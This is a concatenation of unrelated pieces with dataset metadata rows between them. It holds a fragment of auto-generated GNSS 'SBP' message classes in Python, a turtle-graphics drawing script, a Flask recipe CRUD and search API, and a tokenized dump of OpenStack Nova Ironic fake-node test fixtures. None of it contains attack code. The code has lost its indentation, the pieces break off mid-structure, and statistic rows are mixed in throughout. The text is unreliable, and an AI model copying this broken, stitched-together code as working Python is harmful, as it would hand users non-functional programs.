def to_json_dict(self):
self.to_binary()
d = super( MsgGloBiases, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_SV_AZ_EL = 0x0097
class MsgSvAzEl(SBP):
"""SBP class for message MSG_SV_AZ_EL (0x0097).
You can have MSG_SV_AZ_EL inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
Azimuth and elevation angles of all the visible satellites
that the device does have ephemeris or almanac for.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
azel : array
Azimuth and elevation per satellite
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
construct.GreedyRange('azel' / construct.Struct(SvAzEl._parser)),)
__slots__ = [
'azel',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgSvAzEl,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgSvAzEl, self).__init__()
self.msg_type = SBP_MSG_SV_AZ_EL
self.sender = kwargs.pop('sender', SENDER_ID)
self.azel = kwargs.pop('azel')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgSvAzEl.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgSvAzEl(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgSvAzEl._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgSvAzEl._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgSvAzEl._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgSvAzEl, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_OSR = 0x0640
class MsgOsr(SBP):
"""SBP class for message MSG_OSR (0x0640).
You can have MSG_OSR inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The OSR message contains network corrections in an observation-like format
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
header : ObservationHeader
Header of a GPS observation message
obs : array
Network correction for a
satellite signal.
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'header' / construct.Struct(ObservationHeader._parser),
construct.GreedyRange('obs' / construct.Struct(PackedOsrContent._parser)),)
__slots__ = [
'header',
'obs',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgOsr,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgOsr, self).__init__()
self.msg_type = SBP_MSG_OSR
self.sender = kwargs.pop('sender', SENDER_ID)
self.header = kwargs.pop('header')
self.obs = kwargs.pop('obs')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgOsr.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgOsr(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgOsr._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgOsr._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgOsr._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgOsr, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
msg_classes = {
0x004A: MsgObs,
0x0044: MsgBasePosLLH,
0x0048: MsgBasePosECEF,
0x0081: MsgEphemerisGPSDepE,
0x0086: MsgEphemerisGPSDepF,
0x008A: MsgEphemerisGPS,
0x008E: MsgEphemerisQzss,
0x0089: MsgEphemerisBds,
0x0095: MsgEphemerisGalDepA,
0x008D: MsgEphemerisGal,
0x0082: MsgEphemerisSbasDepA,
0x0083: MsgEphemerisGloDepA,
0x0084: MsgEphemerisSbasDepB,
0x008C: MsgEphemerisSbas,
0x0085: MsgEphemerisGloDepB,
0x0087: MsgEphemerisGloDepC,
0x0088: MsgEphemerisGloDepD,
0x008B: MsgEphemerisGlo,
0x0080: MsgEphemerisDepD,
0x001A: MsgEphemerisDepA,
0x0046: MsgEphemerisDepB,
0x0047: MsgEphemerisDepC,
0x0045: MsgObsDepA,
0x0043: MsgObsDepB,
0x0049: MsgObsDepC,
0x0090: MsgIono,
0x0091: MsgSvConfigurationGPSDep,
0x0096: MsgGnssCapb,
0x0092: MsgGroupDelayDepA,
0x0093: MsgGroupDelayDepB,
0x0094: MsgGroupDelay,
0x0070: MsgAlmanacGPSDep,
0x0072: MsgAlmanacGPS,
0x0071: MsgAlmanacGloDep,
0x0073: MsgAlmanacGlo,
0x0075: MsgGloBiases,
0x0097: MsgSvAzEl,
0x0640: MsgOsr,
}
| 29.855911
| 98
| 0.616441
| 24,242
| 193,944
| 4.756662
| 0.030856
| 0.042537
| 0.011864
| 0.012852
| 0.877887
| 0.872276
| 0.863326
| 0.857646
| 0.849451
| 0.834153
| 0
| 0.017862
| 0.282953
| 193,944
| 6,496
| 99
| 29.855911
| 0.811314
| 0.344842
| 0
| 0.792877
| 0
| 0
| 0.054903
| 0
| 0
| 0
| 0.003643
| 0
| 0
| 1
| 0.104843
| false
| 0
| 0.001425
| 0.015385
| 0.226496
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
683e17c123ec58aabdebf37639862cca67858a2e
| 269
|
py
|
Python
|
code/chapter-1/exercise1_12.py
|
Kevin-Oudai/python-solutions
|
d67f6b14723b000fec0011c3e8156b805eb288f7
|
[
"MIT"
] | null | null | null |
code/chapter-1/exercise1_12.py
|
Kevin-Oudai/python-solutions
|
d67f6b14723b000fec0011c3e8156b805eb288f7
|
[
"MIT"
] | null | null | null |
code/chapter-1/exercise1_12.py
|
Kevin-Oudai/python-solutions
|
d67f6b14723b000fec0011c3e8156b805eb288f7
|
[
"MIT"
] | null | null | null |
import turtle as t
t.color("black")
t.forward(50)
t.right(90)
t.forward(50)
t.right(90)
t.forward(100)
t.right(90)
t.forward(100)
t.right(90)
t.forward(100)
t.right(90)
t.forward(50)
t.right(90)
t.forward(100)
t.back(50)
t.right(90)
t.forward(50)
t.back(100)
t.done()
| 12.227273
| 18
| 0.69145
| 60
| 269
| 3.1
| 0.216667
| 0.344086
| 0.301075
| 0.33871
| 0.774194
| 0.774194
| 0.774194
| 0.774194
| 0.607527
| 0.607527
| 0
| 0.159184
| 0.089219
| 269
| 21
| 19
| 12.809524
| 0.6
| 0
| 0
| 0.75
| 0
| 0
| 0.018587
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.05
| 0
| 0.05
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
68714a78c03c6acc6cc92a2ce17558dc65f6e1a5
| 37
|
py
|
Python
|
ica/paraphraseator/datamodules/__init__.py
|
pedrorio/image_caption_augmentation
|
683ed90cecd4bc12f65dc238f1ff2dedbbc1b666
|
[
"MIT"
] | null | null | null |
ica/paraphraseator/datamodules/__init__.py
|
pedrorio/image_caption_augmentation
|
683ed90cecd4bc12f65dc238f1ff2dedbbc1b666
|
[
"MIT"
] | null | null | null |
ica/paraphraseator/datamodules/__init__.py
|
pedrorio/image_caption_augmentation
|
683ed90cecd4bc12f65dc238f1ff2dedbbc1b666
|
[
"MIT"
] | null | null | null |
from . import ImageCaptionsDataModule
| 37
| 37
| 0.891892
| 3
| 37
| 11
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081081
| 37
| 1
| 37
| 37
| 0.970588
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6872df2376b5207237c982baf7647120ba8ba462
| 18,543
|
py
|
Python
|
app/v1/views/recipe_views.py
|
pndemo/yummy-recipes-api
|
ae6729bd1c886ce9872d83488a6eaa99e92be513
|
[
"MIT"
] | null | null | null |
app/v1/views/recipe_views.py
|
pndemo/yummy-recipes-api
|
ae6729bd1c886ce9872d83488a6eaa99e92be513
|
[
"MIT"
] | 3
|
2019-12-20T23:17:20.000Z
|
2022-03-21T22:16:25.000Z
|
app/v1/views/recipe_views.py
|
pndemo/yummy-recipes-api
|
ae6729bd1c886ce9872d83488a6eaa99e92be513
|
[
"MIT"
] | 1
|
2017-12-13T12:44:11.000Z
|
2017-12-13T12:44:11.000Z
|
""" Recipe view for creating, viewing, updating and deleting recipes """
from flask import jsonify, request, url_for
from flask_restful import Resource, reqparse
from sqlalchemy import exc
from app.v1.models.category_models import Category
from app.v1.models.recipe_models import Recipe
from app.v1.validators import data_validator
from app.v1.validators.recipe_validators import validate_recipe_name, validate_ingredients, \
validate_directions
from app.v1.utils.decorators import authenticate
from app.v1.utils.paginator import get_paginated_results
# pylint: disable=C0103
# pylint: disable=W0703
# pylint: disable=W0613
class RecipeView(Resource):
"""Allows for creation and listing of recipe categories."""
method_decorators = [authenticate]
parser = reqparse.RequestParser()
parser.add_argument('recipe_name', type=str, help='Recipes\'s recipe name')
parser.add_argument('ingredients', type=str, help='Recipes\'s ingredients')
parser.add_argument('directions', type=str, help='Recipes\'s directions')
def post(self, access_token, user, category_id):
"""
Process POST request
---
tags:
- Recipe
security:
- Bearer: []
parameters:
- in: path
name: category_id
required: true
description: The id of recipe category
type: int
- in: body
name: body
required: true
description: Recipe's name, ingredients, directions and category_id
type: string
schema:
properties:
recipe_name:
type: string
default: Espresso Esiri
ingredients:
type: string
default: 1) 1 tbsp plus 1 or 2 tsp (20-25 ml) Espresso, 2) 2 \
tbsp (30 ml) Benedictine, 3) Approx. 3 tbsp (40 ml) fresh heavy cream, 4) Unsweetened \
cocoa powder, 5) Ice cubes
directions:
type: string
default: 1) Prepare the Espresso in a small cup. 2) Fill the mixing \
glass 3/4 full with ice cubes. Add the Benedictine and the Espresso. Cool, mixing the \
ingredients with the mixing spoon. 3) Pour into the glass, filtering the ice with a strainer. \
4) Shake the cream, which should be very cold, in the mini shaker until it becomes quite thick. \
5) Rest the cream on the surface of the cocktail, making it run down the back of the mixing spoon. \
6) Garnish with a light dusting of cocoa, and serve.
category_id:
type: int
default: 1
responses:
201:
description: A new recipe created successfully
400:
description: Data validation failed
404:
description: Invalid recipe category id
500:
description: Database could not be accessed
"""
args = self.parser.parse_args()
messages = {}
messages['recipe_name_message'] = validate_recipe_name(args.recipe_name.strip(), category_id)
messages['ingredients_message'] = validate_ingredients(args.ingredients)
messages['directions_message'] = validate_directions(args.directions)
if not data_validator(messages):
return jsonify(messages), 400
try:
category = Category.query.filter_by(id=category_id, user_id=user.id).first()
if category:
recipe = Recipe(recipe_name=args.recipe_name, ingredients=args.ingredients, \
directions=args.directions, category_id=category_id)
recipe.save()
response = jsonify({
'id': recipe.id,
'recipe_name': recipe.recipe_name,
'ingredients': recipe.ingredients,
'directions': recipe.directions,
'category_id': recipe.category_id,
'date_created': recipe.date_created,
'date_modified': recipe.date_modified
})
response.status_code = 201
else:
response = jsonify({'message': 'Sorry, recipe category could not be found.'})
response.status_code = 404
except exc.SQLAlchemyError as error:
return jsonify({'message': str(error)}), 500
return response
def get(self, access_token, user, category_id):
"""
Process GET request
---
tags:
- Recipe
security:
- Bearer: []
parameters:
- in: path
name: category_id
required: true
description: The id of recipe(s) category
type: int
- in: query
name: page
description: Page number to display
- in: query
name: limit
description: Number of recipes to display per page
responses:
200:
description: Categories retrieved successfully
400:
description: Non-integer page and limit values submitted
404:
description: Invalid recipe category id
500:
description: Database could not be accessed
"""
try:
category = Category.query.filter_by(id=category_id, user_id=user.id).first()
if category:
recipes = Recipe.query.filter_by(category_id=category.id).all()
paginated = get_paginated_results(request, recipes, url_for('recipe_view', category_id=category_id) + '?')
if paginated['is_good_query']:
results = []
for recipe in paginated['results']:
obj = {
'id': recipe.id,
'recipe_name': recipe.recipe_name,
'ingredients': recipe.ingredients,
'directions': recipe.directions,
'category_id': recipe.category_id,
'date_created': recipe.date_created,
'date_modified': recipe.date_modified
}
results.append(obj)
response = jsonify({
'category_name': category.category_name,
'results': results,
'previous_link': paginated['previous_link'],
'next_link': paginated['next_link'],
'page': paginated['page'],
'pages': paginated['pages']
})
response.status_code = 200
else:
response = jsonify({'message': 'Please enter valid page and limit values.'})
response.status_code = 400
else:
response = jsonify({'message': 'Sorry, recipe category could not be found.'})
response.status_code = 404
except exc.SQLAlchemyError as error:
return jsonify({'message': str(error)}), 500
return response
class RecipeSpecificView(Resource):
"""Allows for viewing, updating and and deletion of specific recipe category."""
method_decorators = [authenticate]
parser = reqparse.RequestParser()
parser.add_argument('recipe_name', type=str, help='Recipes\'s recipe name')
parser.add_argument('ingredients', type=str, help='Recipes\'s ingredients')
parser.add_argument('directions', type=str, help='Recipes\'s directions')
def get(self, access_token, user, category_id, recipe_id):
"""
Process GET request
---
tags:
- Recipe
security:
- Bearer: []
parameters:
- in: path
name: category_id
required: true
description: The id of recipe category
type: int
- in: path
name: recipe_id
required: true
description: The id of recipe requested
type: int
responses:
200:
description: Recipe retrieved successfully
404:
description: Category/recipe with id could not be found
500:
description: Database could not be accessed
"""
try:
category = Category.query.filter_by(id=category_id, user_id=user.id).first()
if category:
recipe = Recipe.query.filter_by(id=recipe_id, category_id=category.id).first()
if recipe:
response = jsonify({
'id': recipe.id,
'recipe_name': recipe.recipe_name,
'ingredients': recipe.ingredients,
'directions': recipe.directions,
'category_id': recipe.category_id,
'date_created': recipe.date_created,
'date_modified': recipe.date_modified
})
response.status_code = 200
else:
response = jsonify({'message': 'Sorry, recipe could not be found.'})
response.status_code = 404
else:
response = jsonify({'message': 'Sorry, recipe category could not be found.'})
response.status_code = 404
except exc.SQLAlchemyError as error:
return jsonify({'message': str(error)}), 500
return response
def put(self, access_token, user, category_id, recipe_id):
"""
Process PUT request
---
tags:
- Recipe
security:
- Bearer: []
parameters:
- in: path
name: category_id
required: true
description: The id of recipe category
type: int
- in: path
name: recipe_id
required: true
description: The id of recipe requested
type: int
- in: body
name: body
required: true
description: Recipe's name, ingredients and directions
type: string
schema:
properties:
recipe_name:
type: string
default: Apple Cinnamon White Cake
ingredients:
type: string
default: 1) 1 teaspoon ground cinnamon 2) 2/3 cup white sugar \
3) 1/2 cup butter, softened 4) 2 eggs 5) 1 1/2 teaspoons vanilla extract 6) 1 1/2 \
cups all-purpose flour 7) 1 3/4 teaspoons baking powder 8) 1/2 cup milk 9) 1 apple, \
peeled and chopped
directions:
type: string
default: 1) Prepare the Espresso in a small cup. 2) Fill the mixing \
glass 3/4 full with ice cubes. Add the Benedictine and the Espresso. Cool, mixing the \
ingredients with the mixing spoon. 3) Pour into the glass, filtering the ice with a strainer. \
4) Shake the cream, which should be very cold, in the mini shaker until it becomes quite thick. \
5) Rest the cream on the surface of the cocktail, making it run down the back of the mixing spoon. \
6) Garnish with a light dusting of cocoa, and serve.
responses:
200:
description: Recipe updated successfully
404:
description: Category/recipe with id could not be found
500:
description: Database could not be accessed
"""
args = self.parser.parse_args()
messages = {}
messages['recipe_name_message'] = validate_recipe_name(args.recipe_name.strip(), \
category_id=category_id, recipe_id=recipe_id)
messages['ingredients_message'] = validate_ingredients(args.ingredients)
messages['directions_message'] = validate_directions(args.directions)
if not data_validator(messages):
return jsonify(messages), 400
try:
category = Category.query.filter_by(id=category_id, user_id=user.id).first()
if category:
recipe = Recipe.query.filter_by(id=recipe_id, category_id=category.id).first()
if recipe:
recipe.recipe_name = args.recipe_name
recipe.ingredients = args.ingredients
recipe.directions = args.directions
recipe.save()
response = jsonify({
'id': recipe.id,
'recipe_name': recipe.recipe_name,
'ingredients': recipe.ingredients,
'directions': recipe.directions,
'category_id': recipe.category_id,
'date_created': recipe.date_created,
'date_modified': recipe.date_modified
})
response.status_code = 200
else:
response = jsonify({'message': 'Sorry, recipe could not be found.'})
response.status_code = 404
else:
response = jsonify({'message': 'Sorry, recipe category could not be found.'})
response.status_code = 404
except exc.SQLAlchemyError as error:
return jsonify({'message': str(error)}), 500
return response
def delete(self, access_token, user, category_id, recipe_id):
"""
Process DELETE request
---
tags:
- Recipe
security:
- Bearer: []
parameters:
- in: path
name: category_id
required: true
description: The id of recipe category
type: int
- in: path
name: recipe_id
required: true
description: The id of recipe requested
type: int
responses:
200:
description: Recipe updated successfully
404:
description: Category/recipe with id could not be found
500:
description: Database could not be accessed
"""
try:
category = Category.query.filter_by(id=category_id, user_id=user.id).first()
if category:
recipe = Recipe.query.filter_by(id=recipe_id, category_id=category.id).first()
if recipe:
recipe.delete()
response = jsonify({'message': "Recipe {} has been deleted.". \
format(recipe.recipe_name)})
response.status_code = 200
else:
response = jsonify({'message': 'Sorry, recipe could not be found.'})
response.status_code = 404
else:
response = jsonify({'message': 'Sorry, recipe category could not be found.'})
response.status_code = 404
except exc.SQLAlchemyError as error:
return jsonify({'message': str(error)}), 500
return response
class RecipeSearchView(Resource):
"""Allows for searching of a recipe."""
method_decorators = [authenticate]
def get(self, access_token, user, category_id):
"""
Process GET request
---
tags:
- Recipe
security:
- Bearer: []
parameters:
- in: path
name: category_id
required: true
description: The id of recipe category
type: int
- in: query
name: q
description: Recipe name to search
- in: query
name: start
description: id to start category results pagination
- in: query
name: limit
description: Number of recipes to display per page
responses:
200:
description: Recipes retrieved successfully
400:
description: Non-integer page and limit values submitted
404:
description: Category with category id could not be found
500:
description: Database could not be accessed
"""
if request.values.get('q'):
q = request.values.get('q')
else:
q = ''
try:
category = Category.query.filter_by(id=category_id, user_id=user.id).first()
if category:
recipes = Recipe.query.filter(Recipe.recipe_name.ilike('%' + q + \
'%')).filter_by(category_id=category_id).all()
paginated = get_paginated_results(request, recipes, url_for('recipe_search_view', \
category_id=category_id) + '?q=' + q + '&')
if paginated['is_good_query']:
results = []
for recipe in paginated['results']:
obj = {
'id': recipe.id,
'recipe_name': recipe.recipe_name,
'ingredients': recipe.ingredients,
'directions': recipe.directions,
'category_id': recipe.category_id,
'date_created': recipe.date_created,
'date_modified': recipe.date_modified
}
results.append(obj)
response = jsonify({
'results': results,
'previous_link': paginated['previous_link'],
'next_link': paginated['next_link'],
'page': paginated['page'],
'pages': paginated['pages']
})
response.status_code = 200
else:
response = jsonify({'message': 'Please enter valid page and limit values.'})
response.status_code = 400
else:
response = jsonify({'message': 'Sorry, recipe category could not be found.'})
response.status_code = 404
except exc.SQLAlchemyError as error:
return jsonify({'message': str(error)}), 500
return response
recipe_view = RecipeView.as_view('recipe_view')
recipe_specific_view = RecipeSpecificView.as_view('recipe_specific_view')
recipe_search_view = RecipeSearchView.as_view('recipe_search_view')
| 39.791845
| 122
| 0.542091
| 1,855
| 18,543
| 5.302965
| 0.137466
| 0.052862
| 0.019315
| 0.019823
| 0.811223
| 0.802684
| 0.793026
| 0.784487
| 0.784182
| 0.760903
| 0
| 0.018881
| 0.377339
| 18,543
| 465
| 123
| 39.877419
| 0.833102
| 0.302648
| 0
| 0.797235
| 0
| 0
| 0.127178
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02765
| false
| 0
| 0.041475
| 0
| 0.170507
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6884c3d0ff2f955835d4344cc95691c310650822
| 9,772
|
py
|
Python
|
nova/tests/unit/scheduler/ironic_fakes.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/unit/scheduler/ironic_fakes.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/unit/scheduler/ironic_fakes.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | 2
|
2017-07-20T17:31:34.000Z
|
2020-07-24T02:42:19.000Z
|
begin_unit
comment|'# Copyright 2014 OpenStack Foundation'
nl|'\n'
comment|'# All Rights Reserved.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
string|'"""\nFake nodes for Ironic host manager tests.\n"""'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
name|'import'
name|'objects'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|variable|COMPUTE_NODES
name|'COMPUTE_NODES'
op|'='
op|'['
nl|'\n'
name|'objects'
op|'.'
name|'ComputeNode'
op|'('
nl|'\n'
name|'id'
op|'='
number|'1'
op|','
name|'local_gb'
op|'='
number|'10'
op|','
name|'memory_mb'
op|'='
number|'1024'
op|','
name|'vcpus'
op|'='
number|'1'
op|','
nl|'\n'
name|'vcpus_used'
op|'='
number|'0'
op|','
name|'local_gb_used'
op|'='
number|'0'
op|','
name|'memory_mb_used'
op|'='
number|'0'
op|','
nl|'\n'
name|'updated_at'
op|'='
name|'None'
op|','
name|'cpu_info'
op|'='
string|"'baremetal cpu'"
op|','
nl|'\n'
DECL|variable|host
name|'host'
op|'='
string|"'host1'"
op|','
nl|'\n'
name|'hypervisor_hostname'
op|'='
string|"'node1uuid'"
op|','
name|'host_ip'
op|'='
string|"'127.0.0.1'"
op|','
nl|'\n'
name|'hypervisor_version'
op|'='
number|'1'
op|','
name|'hypervisor_type'
op|'='
string|"'ironic'"
op|','
nl|'\n'
DECL|variable|stats
name|'stats'
op|'='
name|'dict'
op|'('
name|'ironic_driver'
op|'='
nl|'\n'
string|'"nova.virt.ironic.driver.IronicDriver"'
op|','
nl|'\n'
DECL|variable|cpu_arch
name|'cpu_arch'
op|'='
string|"'i386'"
op|')'
op|','
nl|'\n'
DECL|variable|supported_hv_specs
name|'supported_hv_specs'
op|'='
op|'['
name|'objects'
op|'.'
name|'HVSpec'
op|'.'
name|'from_list'
op|'('
nl|'\n'
op|'['
string|'"i386"'
op|','
string|'"baremetal"'
op|','
string|'"baremetal"'
op|']'
op|')'
op|']'
op|','
nl|'\n'
name|'free_disk_gb'
op|'='
number|'10'
op|','
name|'free_ram_mb'
op|'='
number|'1024'
op|','
nl|'\n'
name|'cpu_allocation_ratio'
op|'='
number|'16.0'
op|','
name|'ram_allocation_ratio'
op|'='
number|'1.5'
op|','
nl|'\n'
DECL|variable|disk_allocation_ratio
name|'disk_allocation_ratio'
op|'='
number|'1.0'
op|')'
op|','
nl|'\n'
name|'objects'
op|'.'
name|'ComputeNode'
op|'('
nl|'\n'
name|'id'
op|'='
number|'2'
op|','
name|'local_gb'
op|'='
number|'20'
op|','
name|'memory_mb'
op|'='
number|'2048'
op|','
name|'vcpus'
op|'='
number|'1'
op|','
nl|'\n'
name|'vcpus_used'
op|'='
number|'0'
op|','
name|'local_gb_used'
op|'='
number|'0'
op|','
name|'memory_mb_used'
op|'='
number|'0'
op|','
nl|'\n'
name|'updated_at'
op|'='
name|'None'
op|','
name|'cpu_info'
op|'='
string|"'baremetal cpu'"
op|','
nl|'\n'
DECL|variable|host
name|'host'
op|'='
string|"'host2'"
op|','
nl|'\n'
name|'hypervisor_hostname'
op|'='
string|"'node2uuid'"
op|','
name|'host_ip'
op|'='
string|"'127.0.0.1'"
op|','
nl|'\n'
name|'hypervisor_version'
op|'='
number|'1'
op|','
name|'hypervisor_type'
op|'='
string|"'ironic'"
op|','
nl|'\n'
DECL|variable|stats
name|'stats'
op|'='
name|'dict'
op|'('
name|'ironic_driver'
op|'='
nl|'\n'
string|'"nova.virt.ironic.driver.IronicDriver"'
op|','
nl|'\n'
DECL|variable|cpu_arch
name|'cpu_arch'
op|'='
string|"'i386'"
op|')'
op|','
nl|'\n'
DECL|variable|supported_hv_specs
name|'supported_hv_specs'
op|'='
op|'['
name|'objects'
op|'.'
name|'HVSpec'
op|'.'
name|'from_list'
op|'('
nl|'\n'
op|'['
string|'"i386"'
op|','
string|'"baremetal"'
op|','
string|'"baremetal"'
op|']'
op|')'
op|']'
op|','
nl|'\n'
name|'free_disk_gb'
op|'='
number|'20'
op|','
name|'free_ram_mb'
op|'='
number|'2048'
op|','
nl|'\n'
name|'cpu_allocation_ratio'
op|'='
number|'16.0'
op|','
name|'ram_allocation_ratio'
op|'='
number|'1.5'
op|','
nl|'\n'
DECL|variable|disk_allocation_ratio
name|'disk_allocation_ratio'
op|'='
number|'1.0'
op|')'
op|','
nl|'\n'
name|'objects'
op|'.'
name|'ComputeNode'
op|'('
nl|'\n'
name|'id'
op|'='
number|'3'
op|','
name|'local_gb'
op|'='
number|'30'
op|','
name|'memory_mb'
op|'='
number|'3072'
op|','
name|'vcpus'
op|'='
number|'1'
op|','
nl|'\n'
name|'vcpus_used'
op|'='
number|'0'
op|','
name|'local_gb_used'
op|'='
number|'0'
op|','
name|'memory_mb_used'
op|'='
number|'0'
op|','
nl|'\n'
name|'updated_at'
op|'='
name|'None'
op|','
name|'cpu_info'
op|'='
string|"'baremetal cpu'"
op|','
nl|'\n'
DECL|variable|host
name|'host'
op|'='
string|"'host3'"
op|','
nl|'\n'
name|'hypervisor_hostname'
op|'='
string|"'node3uuid'"
op|','
name|'host_ip'
op|'='
string|"'127.0.0.1'"
op|','
nl|'\n'
name|'hypervisor_version'
op|'='
number|'1'
op|','
name|'hypervisor_type'
op|'='
string|"'ironic'"
op|','
nl|'\n'
DECL|variable|stats
name|'stats'
op|'='
name|'dict'
op|'('
name|'ironic_driver'
op|'='
nl|'\n'
string|'"nova.virt.ironic.driver.IronicDriver"'
op|','
nl|'\n'
DECL|variable|cpu_arch
name|'cpu_arch'
op|'='
string|"'i386'"
op|')'
op|','
nl|'\n'
DECL|variable|supported_hv_specs
name|'supported_hv_specs'
op|'='
op|'['
name|'objects'
op|'.'
name|'HVSpec'
op|'.'
name|'from_list'
op|'('
nl|'\n'
op|'['
string|'"i386"'
op|','
string|'"baremetal"'
op|','
string|'"baremetal"'
op|']'
op|')'
op|']'
op|','
nl|'\n'
name|'free_disk_gb'
op|'='
number|'30'
op|','
name|'free_ram_mb'
op|'='
number|'3072'
op|','
nl|'\n'
name|'cpu_allocation_ratio'
op|'='
number|'16.0'
op|','
name|'ram_allocation_ratio'
op|'='
number|'1.5'
op|','
nl|'\n'
DECL|variable|disk_allocation_ratio
name|'disk_allocation_ratio'
op|'='
number|'1.0'
op|')'
op|','
nl|'\n'
name|'objects'
op|'.'
name|'ComputeNode'
op|'('
nl|'\n'
name|'id'
op|'='
number|'4'
op|','
name|'local_gb'
op|'='
number|'40'
op|','
name|'memory_mb'
op|'='
number|'4096'
op|','
name|'vcpus'
op|'='
number|'1'
op|','
nl|'\n'
name|'vcpus_used'
op|'='
number|'0'
op|','
name|'local_gb_used'
op|'='
number|'0'
op|','
name|'memory_mb_used'
op|'='
number|'0'
op|','
nl|'\n'
name|'updated_at'
op|'='
name|'None'
op|','
name|'cpu_info'
op|'='
string|"'baremetal cpu'"
op|','
nl|'\n'
DECL|variable|host
name|'host'
op|'='
string|"'host4'"
op|','
nl|'\n'
name|'hypervisor_hostname'
op|'='
string|"'node4uuid'"
op|','
name|'host_ip'
op|'='
string|"'127.0.0.1'"
op|','
nl|'\n'
name|'hypervisor_version'
op|'='
number|'1'
op|','
name|'hypervisor_type'
op|'='
string|"'ironic'"
op|','
nl|'\n'
DECL|variable|stats
name|'stats'
op|'='
name|'dict'
op|'('
name|'ironic_driver'
op|'='
